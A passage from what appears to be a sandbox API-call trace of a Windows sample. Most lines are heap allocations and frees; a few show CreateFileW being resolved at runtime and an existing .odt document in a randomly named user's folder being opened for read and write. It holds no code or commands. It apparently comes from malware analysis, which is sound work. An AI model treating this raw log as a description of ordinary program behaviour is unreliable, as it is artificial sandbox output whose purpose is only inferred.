hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.930] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0178.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0178.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.931] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0178.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0xbca008 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\g4fthfjbwb6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0178.934] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0178.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 